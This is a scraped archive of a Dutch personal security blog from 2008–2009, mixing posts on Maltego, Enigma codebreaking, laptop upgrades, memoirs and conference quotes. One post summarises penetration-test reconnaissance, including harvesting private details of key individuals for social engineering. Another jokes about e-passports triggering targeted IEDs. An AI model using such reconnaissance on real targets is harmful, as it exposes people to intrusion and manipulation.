But what if the cloud, errr, sort of not does what the EULA sort of makes you believe? What if the lawyer@TheCould p0wnzers you? And your data? What if, insert-your-personaly-favorite-upper-being-here, strikes back and lets some unknown entity take control over, well, you, basically?

How does one secure the absolute power of the cloud? There are some very smart people talking about it but lots of discussion is still about the definition, much less about the consequences, let alone what it actually means or how to do it.

Do you want to be the one who turns of the light now that everybody has left the old arena, or will you participate in shaping the future?

I should do stuff more often, at least it makes far hotter stuff come out.

Couple of days ago I decided that both MAC laptops in the house needed more storage. The G4 PowerBook and the MacBook. So I ordered a Western Digital Scorpio 250GB 5400RPM and a Western Digital Scorpio 320GB 5400RPM. The replacement of the MacBook one can do with a sharp kitchen knife, no problem. Just remove the batery [do not bother shutting the OS down, it's as stable as my weight] and take a sharp kitchen knife [I used the new Global one I gave my wife a couple of days ago]. Unscrew 3 little screws, pull out the harddisk, take a strong plyer, remove the 4 screws, take the plastic thingy, wrap it on the new disk, sort of re attach the 4 screws, stick the thing back in. Ram the old battery in and of you go [never mind about the 3 little screws and the metal strip, all just surplus weight].

Reinstall and do not mind about the updates that want you to reboot your DVD version of the OS 4 times!

Now the Powerbook, that is another story. About 23 philips screws [tiny fuckers!] and then 2 torx 6, that is SIX, not 8, but 6, the smallest possible tool made only in Switzerland and it will set you back about the same amount of euroos as the 320Gb disk.

Then you get to pull of two, well, 'connectors' that are actually used open ended flatcables: class construction. Putting the whole thing back is a joy. Takes the precision of a live-bomb-defuser, nice enginering.

Installing the OS of course requieres the PPC version. Inserting the iMac Intel version yields a nice panic message. Never mind about the I-do-not-know-how-many updates and reboots [even for the so called 3.1.x SAFARY update one gets a reboot!], for they slow down the secure OS X anyway.

Right after finishing something flashy caught my eye: the MHZ2 CJ.

A 2.5 inch Serial-ATA Revision 2.6 (Gen1i and Gen2i) hard disk with embedded AES 256-bit hardware-based encryption, high-speed rotational speed of 7200rpm, it supports SATA 3.0Gbit/s and the capacities go up to 320GB with a 16MB buffer... How is that for cool?

You know what that means as soon as you see it: dumping the current disk for no reason on ebay, including all the private data it has accumelated in a months time and over pay for the new disk since it is new and hot.

So there is Maltego, the coolest tool for finding information and there are machines that find lots of data. Of course Google uses some very smart alogrithims and Udi Manber really knows what he's talking about. On April 16, 2008 he answered the question "When I come to a Google in the future the context of my social network could be folded into the search?" with "I can imagine if you give us permission to do that, and we find that that’s useful for some queries. The question is, what percentage of queries and what kind of queries? When should you use it and when should you not use it?"

This had me completly baffeld. WHAT? I was saying to myself WHAT IS WRONG WITH THIS DUDE? I mean, after one look at the concept of Maltego I knew that that is the only way forward. Maybe he drank a little too much Google Gulp? Maybe he was trying to hide something since Google does not do pre-annoucements? Or maybe, he'd seen Maltego of Delver too and was just trying to surpress their market value so the goog's could snatch it up for little money in a little time?

"We have no intention of competing with the Googles of the world, because Google is doing a very good job of indexing the Web and bringing you the Wikipedia page of every search query you're looking for," says Liad Agmon, CEO of Delver. But we've been there, seen it, and even do it ourselfs now.

But that does not satisfy anymore. You know the procedure yourself: go to google.com, type a couple of keywords, check the first listing, alter the keywords [order even], check the listing and on and on. Most of the listings you get will be actively manipulated by crooks and link spammers.

So we need something else. As Anand Rajaraman puts it: if you have limited resources, add more data rather than fine-tuning the weights on your fancy machine-learning algorithm. Of course, you have to be judicious in your choice of the data to add to your data set. And this is exactly the point I am trying to drive home. More data sources [and some very decent post processing] enhances the results in amazing ways. [he works on his own SE too, called kosmix].

Some say, it is a terrible idea, like KublaiKhan. "This sort of searching will result in information from 'opposingsides' of controversies or arguments being deprecated, resulting inskewed information being available--because people tend to associatethemselves with other people of the same opinion."He goes on: "This new search engine will be wildly popular amongst thetype of person who enjoys violent flamewars, and will be useless forany person who wishes to consider both sides of a situation beforeforming an opinion... so it's going to be an enormous success and if I had the cash I'd invest in it. :-/"

Personally I would like to quote merreborn in reply to that remark:
"Sorry, I can't friend you, you'll screw up my search results"

Update:
Seems there is much much more going on and wrong between google and social websites...

As great a machine the Enigma was, it too could not prevent users from messing it up. Examples:

Part of the first class encryption of the Enigma was the possibility for the clerk to make up his own six-letter settings. This let to the Polish cryptanalysts occasionally being able to guess the settings. The military did not allow an obvious setting such as ABC. However, cipher clerks sometimes chose settings like QWE (the first three letters on the keyboard) or names. In the example above, if the first three letters were HIT, the cryptanalysts could guess that KOS and RLB were the ciphers to LER, spelling out HITLER. BER was usually followed by the ciphers of LIN. One particular German code clerk continually used his girlfriend’s name, Cillie, for his messages, and so these easy-to-guess indicators became known as "Cillies."

After the English had boarded the U-110 [thanks Fritz-Julius Lemp for being a pussy!] and got their hands on a working Enigma [with all dials in the correct setting for the whole month], they where able to destroy lots of U boats that where decimating the US-UK ships. Admiral Doenitz just knew something was wrong and made a change by added a thin fourth rotor between the leftmost rotor and the reflecting plate.

Bletchley Park learned of the impending change from decrypts and captured material, but until it was actually implemented there was little they could do to prepare. Fortunately, the Germans made an error. In December 1941, before the change had been made official, a U-boat sent a message using the four-rotor machine. To compound the mistake, the same message was retransmitted using only three rotors. From this seemingly innocuous error, the cryptanalysts at BP determined the wiring of the fourth rotor. :P

In order to set up the U.S. Navy Bombe, cryptanalysts first had to determine a "crib." A crib is the unenciphered text that is assumed, or known, to appear in the message.

Cribs could come through a variety of methods. Some of the best cribs came from errors made by the Germans themselves. On more than one occasion, a German signal clerk sent the same message twice in two different codes. If the code for one was known, it provided a crib for the unknown system.

Another frequent German mistake came in standardized messages. For example, a shore weather station in the Bay of Biscay sent out a message every day at 07:00 which began, "The weather in the Bay of Biscay will be. . . ." Knowing the exact wording of a message made a perfect crib for the Allies, so it became a high priority to intercept the daily message from this weather station.

A final example of a common German error involved the practice of submerged U-boats. When the submarines resurfaced after extended periods of time under water, they requested all the important messages they had missed while below the waves. The transmissions that followed inevitably involved communications previously sent and deciphered. Cryptanalysts merely checked the back files for messages with the same number of letter groups and used them as cribs for the new message.Since the resulting message would be identical to the previous one, it helped reveal the Enigma setting for the current day. With the daily setting, all the current day's messages could be read.

Other cribs came from knowing the current activities of the enemy. If, for example, a battle occurred, it could be assumed that messages following the attack reported on the battle. It was more difficult for the cryptanalysts to build cribs for these types of messages since it involved guesswork.

Because the Enigma rotors moved with each keystroke, a letter typed twice usually enciphered to two different letters. Also, the Enigma could not encrypt a letter to itself. Finally, the Germans indicated a space between words with the letter X and spelled out numbers.

Knowing these details played an important role in ultimately breaking the Enigma's daily settings.

Now why do we see these same weaknesses made over and over again?

Sometime ago there was one for sale too. Damn that would have been the hottest geek present ever. Prices have not been too extreme either...

As much harm as the improvised explosive devices (IED) do, now it is time for version 2.0

The interactive IED, the IED that will blow up the people of the nationality you want dead, not just a passerby. Till now it has been difficult at times to determine the timing to actually kill the guy you hate the most. Come to the resque:

E-Passports

Already in 2006 it was shown that the then 'new' RFID'ed passports where both hackable, and possed a security threat. Since a couple of weeks the Dutch have entered the arena and are being sold E-Passports too.

You gotta love it when goverment people do security.

At BlackHat, I had some pretty interesting discussions with FX and others, about how 'olt skool' simply breaking stuff is after you've done your share of pentesting & reverse engineering. How much more interesting it is to _secure_ stuff, one way _and_ the other. Because no matter what you do: things will break.

As a matter of fact, since most of us are working for clients and we sell our services, they too are better of when we do not 'just' display how things break, but how we make things break safely.

In that light, the interview my good friend [and smart B to boot] Craig Balding did with Mr. Ross Anderson about security engineering comes right on time. Enjoy.

PS
It was brought to my attention that Amazon does some weird dating stuff. The book will be Released on April 14th, but they have one in stock now, if you order today you can have it delivered on the 9th of April... how's that for JIT!

You know, today I bought a lighter, a Varaflame Ronson.
You know the brand?

I think everbodies father had one, so did mine.
I was about 6 or so and he got one. A nice shiny silver one.

I woke up early one day and took it from the living room into my room. We had some sort of 'grass' flooring, typical for hippies at that time [think early 70's]

Somehow I managed to set it alight.

Everybody is a sleep, my 4 year old sister, my parents: everybody in my whole wide world.
The room starts filling up with smoke, heat, flames and a one scared boy: moi.

I used the same trick as I still do:
“Dear Lord, let me survive this now and I know that in the future I will pay back humanity!”
Suddenly I moved to the hallway, my mother always left two glasses of water there for when we would wake up early. I took them and threw them in the fire. My feet and some other stuff took care of the remaining fire.

...

A couple of minutes [or hours?] my parents woke up, smelled the smoke, saw the hole and realized very quickly what had happened and who started it all.

Never mind who stopped it, but they knew all right who started it.

The punishment I got for that was something that... I cherished. I loved it, for I was a live! And so where they. I knew I had something to make up to, but I also knew that there was nothing in the world what could kill me until I was ready.

And today I bumped into one of those lighters. And now I own one.

There is moments in live, that somehow your surroundings, tells you more about you then about the actual artefacts that make it up. One of those moments just happened to me.

It was a fleemarket, like you see many of them, when you are into fleemarkets. Big, cold, and stuffed with... stuff. I have been to a my fare share of those. Sometimes by accident, sometimes because someone tells you there is something special to be had, sometimes with new [girl-]friends who take you places you do normally not go to.

This visit was inspired by new friends.

It is a big ass flee market, with over 3.000 parking spots, with admission fees, with people rubber stamping each other, with rules and regulations: the works.

Anyway, people try to sell all kinds of stuff, old & fake, polished & rotten. Basically whatever was unwanted at one point of it's existence.

So I am surrounded by stuff and suddenly it strikes me: lots of it might be old,_now_, some of it broken _new_ and some of it unwanted _now_ by OMG*d: this is stuff that I saw enriching the world... when I was growing up!

The stuff that once you thought "WTF?" about and later made it, the things with features that you young people that for granted now but where _new_ and unheard of before.

I found out that I can remember each and every single Matchbox car I had, and the ones I did not have too. I saw most of them tattered and brushed, like mine where after 'they had an accident' but at least mine where loved and owned. The ones on the market where love-less.

The worst thing was this car. I got it on a Monday, loved it to death because it was so advanced. It was a little bigger then the normal cars. It had stuff in it that you could get out from the back. I took it to school, played with it day and night. One day my [Thursday] teacher Boudy de Vries took it from me. He disliked us boys playing with cars instead of listening to the same old, some old.

On Monday I collected all my witt and guts and asked it back. The sucker simply said [and I remember the smuck smile on his bearded face up and till today!] "I do not have it and never took it!"

The son of a bitch never gave it back. Boudy de Vries, I hate that guy with a passion.

World 1.0 VS World 2.0
Knowledge sharing and learning is imposed additional work VS Knowledge sharing and social learning is a welcome natural part of people's everyday work

Work takes places behind closed doors VS Work takes place transparently where everyone can see it

IT Tools are imposed on people VS People select the tools that work best for them

People are controlled out of fear they will do wrong VS People are given freedom in return for accepting responsibility

Information is centralized, protected and controlled VS Information is distributed freely and uncontrolled

Publishing is centrally controlled VS Anyone can publish what they want

Context is stripped from information VS Context is retained in the form of stories

People think quietly alone VS People think out load together
People tend to write in the third person, in a professional voice VS People write in the first person in their own voice

People especially those in authority are closed to new ideas and new ways of working VS Everyone is open to new ideas

Information is pushed to people whether they have asked for it or not VS People decide the information they need and subscribe to it

The world is seen through a Newtonian cause and effect model VS The world is recognized to be complex and that different approaches are needed

Now all looks good and well in World 2.0. Everybody spimply changes from consumer to prosumer and takes an active role. Business as usual 2.0. Cool. But where does one find managers 2.0?

So I got the sites:

DoKnowEvil.nl
DoKnowEvil.biz
DoKnowEvil.org
DoKnowEvil.de
DoKnowEvil.eu

Now all that is missing is the T-Shirt, Krassimir :P

A couple of days ago I wrote kinda ecstatic about the possibilities of Maltego. Turns out, I am right [duh!].

Anand Rajaraman is the Consulting Assistant professor at the Computer Science Department at Stanford University, and he drives the point home much better in this article. To sum ot up, if you have limited resources, add more data rather than fine-tuning the weights on your fancy machine-learning algorithm. Of course, you have to be judicious in your choice of the data to add to your data set.

That is exactly what Maltego does and lets you do. It gives a plenitude of data sources and lets you, the human, decide what information weights most, considering your particular query.

Dr. Wolfgang Schäuble knows now!

Cybersecurity in a New Digital Age, by Dr. Dan Geer.

Samsung phones look nice, feel good and are populair.

A crying shame is the absolute lack of OSX support. No sync for most of them via iSync and a bunch of self hacked config files to make is sort of work.

Shame on samsung, my money is going elsewhere.

Roelof Temmingh & Chris Böhme

http://www.paterva.com

Maltego, Maltego will change the [online] world as we know it. What google once did to searching Maltego will do to finding.

Currently all that is being shown & displayed is fast amounts of data: exactly the thing that computers like and do a good job with, but unusable for humans. Enters Maltego. Maltego will take a seed [individual's name, a domain name, email address, whatever] and finds related data, just like everybody and his dog does.

But then the 'post processing' starts, and Maltego will show it's muscle: based up some smart correlating and weighting, it will show you the results it found, in a graphical way, in a nice patern. In comes the thing we humans do good: patern regonision. We excel at seeing paterns and since Maltego excels at displaying it, we now have a man-machine combination.

Give me some time and I'll show you...

http://www.paterva.com/web2/maltego/maltego.html

More later.

"It's better to ask for forgivenes then to ask for permission" anon

"We do not want our _users_ to break the EULA" Roelof Temmingh

"We rely on the inteligence of our router to play nice. Even if we know hop 5 is not playing "nice" with our packets, there is nothing we can do but stop... that sounds like DoS to me" FX

"Nobody uses the latest version of IOS. It is "banana" software: it ships green, and after it lays a long time at the customer, it gets yellow and eatable :P"

"In 12.4 they create heap logs in the data section, since it has space after loading"

"Uncompressing data in READ ONLY memory & writing it back.. because we can!"

"A problem with IOS is that you can not find what was wrong 5 minutes ago, if the processes start behaving good again"

CIR is a cool tool under development.

"Law-full interception: the government snooping IOS, what do you know about it?"

"It enabled us to see if & what is wrong, or that we have plenty time to replace everything with Juniper boxes :D"

"Software that needs to parse large numbers of formats are potentialy dangerous [think AV, Indexing software, media players]"

"Media parsing should be done sandboxed"

"Media files|streams are as dangerous as any other zip file"

So, two guys from sensepost are doing this training on hacking by numbers.

Interesting stuff, it basically boils down to: get as much as possible information on your target. Do this by utilizing public sources [think google [link:], netcraft, ARIN, msn.livesearch.com [ip:], kartoo.com and the likes] and reverse the pointers you find there. See what else is hosted on these IP addresses, see what other domains are registered and|or linked. Check for 'backlinks' that might indicate strong ties between companies.

And keep doing the:
:start
Single domain
Expand
Lots of domains
Reduce
Find what we really need
goto start

Both Nick & Jeremy keep saying: "Remember, domain names are IP addresses and IP addresses are points of attack"

Last but not least:
Find out private information of key individuals for social engineering.

Oh and for our hosts, this is for you :D

Peeps & posts [from] here:
Nathan McFeters
Petko D. Petkov
PortSwigger & Marcus
Mikko Hyykoski
Sandro

And some who are not:
Dimitri Sklyarov

I got a bunch of Linksys WRT54GS [version 4] laying around. Got a decent Internet pipe too. Got some altitude available. No AC power where I need it.

So.

Sveasoft I like as replacement firmware, and they released a MESH version.
There are plenty of people who attempted to run a WRT of of solar.

Soon my SSID will popup all over :P

Power consumption and solar needs

So, I read the book, "The book thief" [and so should you!].

I'll drink the wine:
Montepulciano D'Abruzzo
that is Red
and TRebbian D'Abruzzo
that is white

What's next?

Uncle Milton Industries has been selling ant farms to children since 1956. Some years ago, I remember opening one up with a friend. There were no actual ants included in the box. Instead, there was a card that you filled in with your address, and the company would mail you some ants. My friend expressed surprise that you could get ants sent to you in the mail.

I replied: "What's really interesting is that these people will send a tube of live ants to anyone you tell them to."

Security requires a particular mindset. Security professionals -- at least the good ones -- see the world differently. They can't walk into a store without noticing how they might shoplift. They can't use a computer without wondering about the security vulnerabilities. They can't vote without trying to figure out how to vote twice. They just can't help it.

SmartWater is a liquid with a unique identifier linked to a particular owner. "The idea is for me to paint this stuff on my valuables as proof of ownership," I wrote when I first learned about the idea. "I think a better idea would be for me to paint it on your valuables, and then call the police."

Really, we can't help it.

This kind of thinking is not natural for most people. It's not natural for engineers. Good engineering involves thinking about how things can be made to work; the security mindset involves thinking about how things can be made to fail. It involves thinking like an attacker, an adversary or a criminal. You don't have to exploit the vulnerabilities you find, but if you don't see the world that way, you'll never notice most security problems.

[...]

The security mindset is a valuable skill that everyone can benefit from, regardless of career path.

Who's gonna come?

I know I do!

It isn't, still the global sums now exceed $300 billion a year. India ($27 billion), China ($26 billion) and Mexico ($25 billion) are the leading beneficiaries. Some small countries increasing their national incomes by more than 20 percent. Egypt gets more from remittances than it does from the Suez Canal.

But when I ask you to name a single country that has developed through remittances: the answer is no — there's none.

SSL-Explorer is the world's first open-source, browser-based SSL VPN solution. This unique remote access control solution provides you with a means of securely accessing intranet applications and resources using a standard web browser.

No client-side software needs to be installed on your user's systems and maintenance is centralised and simple. SSL-Explorer relies on the ubiquitous Java™ web technology and hence requires just a standard web browser to take advantage of full remote access. Network traffic can be tunnelled through the SSL connection with ease and your email and intranet web/file resources are securely accessible from outside the corporate network with just a single firewall configuration required post-installation.

Now you can carry your favorite computer programs along with all of your bookmarks, settings, email and more with you. Use them on any Windows computer. All without leaving any personal data behind.

PortableApps.com provides a truly open platform that works with any hardware you like (USB flash drive, iPod, portable hard drive, etc). It's open source built around an open format that any hardware vendor or software developer can use.

The Portable Apps Suite™ is free. It contains no spyware. There are no advertisements. It isn't a limited or trial version. There is no additional hardware or software to buy. You don't even have to give out your email address. It's 100% free to use, free to copy and free to share.

de ridder bekende ruiterlijk
dat hij niet ridderlijk was
maar ruiter

de ruiter bekende ridderlijk
dat hij niet ruiterlijk was
maar ridder

Today gotta be one of the blackest days of my live.

You know, one of those days that you anticipated, that you knew was coming, that was inevitable.

One of them days you had thought of, prepaired for, and applied "your worst case scenario solution book" to, a thousand times.

One of them days you saw coming, and you knew would bring hell on earth, but you live by the coercion or escalation domination doctrine.

The day that you would be as sharp as a raisor. Clean. Ready. Just. And most of all: do the right thing.

The day you'd have G*d on your side.

But then s|he took a day off and you tripped, of balance. And somehow things got really out of hand. You lost control over everything. You:

Used the wrong words.
Fcuked up the timing.
Lost the oversight.
Held the book upside down.
Wet your pants.

Today, march 11th, will go down in my history book as the day that was and should not have been.

I knew I should have pushed the publish button.

Start FireFox, create a new bookmark [I like it on the bookmarktoolbar], enter a goodname [FullScreen seems nice] and enter this line of code:

javascript:self.moveTo(0,0); self.resizeTo(screen.availWidth,screen.availHeight);

Et voilla: Sarah got her fullscreen browser!

Get handbrake and set the preset to iPhone/iPod touch.
It's smaller and optimized for the iPhone native resolution.

Enjoy!

Of course this is not a first. And of course there is are some good solutions, one I like best is called "Pretty Good BGP" read more about it [PDF alert], if you like.

Was it a typo on a filter over at AS17557? Most likely we will never know, since those people in Pakistan are not really the kind of open minded guys, hence the hijack of YouTube's IP's in the first place.

Maybe this will lead to a global split of the I-network as we know it.

mokum von Amsterdam

dinsdag 14 juli 2009

maandag 13 juli 2009

dinsdag 16 juni 2009

vrijdag 12 juni 2009

woensdag 10 juni 2009

zondag 7 juni 2009

vrijdag 5 juni 2009

woensdag 3 juni 2009

woensdag 15 april 2009

dinsdag 14 april 2009

vrijdag 10 april 2009

donderdag 9 april 2009

woensdag 1 april 2009

donderdag 12 maart 2009

woensdag 11 maart 2009

zondag 8 maart 2009

zaterdag 28 februari 2009

woensdag 25 februari 2009

dinsdag 17 februari 2009

vrijdag 23 januari 2009

maandag 5 januari 2009

woensdag 31 december 2008

dinsdag 30 december 2008

dinsdag 23 december 2008

zondag 14 december 2008

zaterdag 29 november 2008

woensdag 26 november 2008

dinsdag 25 november 2008

vrijdag 21 november 2008

vrijdag 31 oktober 2008

woensdag 29 oktober 2008

zaterdag 25 oktober 2008

vrijdag 17 oktober 2008

vrijdag 3 oktober 2008

zaterdag 27 september 2008

zondag 21 september 2008

zondag 14 september 2008

zondag 7 september 2008

vrijdag 29 augustus 2008

donderdag 28 augustus 2008

zondag 24 augustus 2008

vrijdag 15 augustus 2008

donderdag 14 augustus 2008

woensdag 13 augustus 2008

dinsdag 12 augustus 2008

zondag 10 augustus 2008

donderdag 7 augustus 2008

dinsdag 5 augustus 2008

zaterdag 2 augustus 2008

vrijdag 1 augustus 2008

dinsdag 29 juli 2008

maandag 28 juli 2008

vrijdag 25 juli 2008

woensdag 23 juli 2008

dinsdag 22 juli 2008

1.

2.

3.

4.

Fix 1:

Fix 2:

5.

maandag 21 juli 2008

vrijdag 18 juli 2008

donderdag 17 juli 2008

dinsdag 15 juli 2008

zaterdag 12 juli 2008

donderdag 10 juli 2008

woensdag 9 juli 2008

maandag 7 juli 2008

dinsdag 1 juli 2008

dinsdag 24 juni 2008

donderdag 19 juni 2008

woensdag 18 juni 2008

dinsdag 17 juni 2008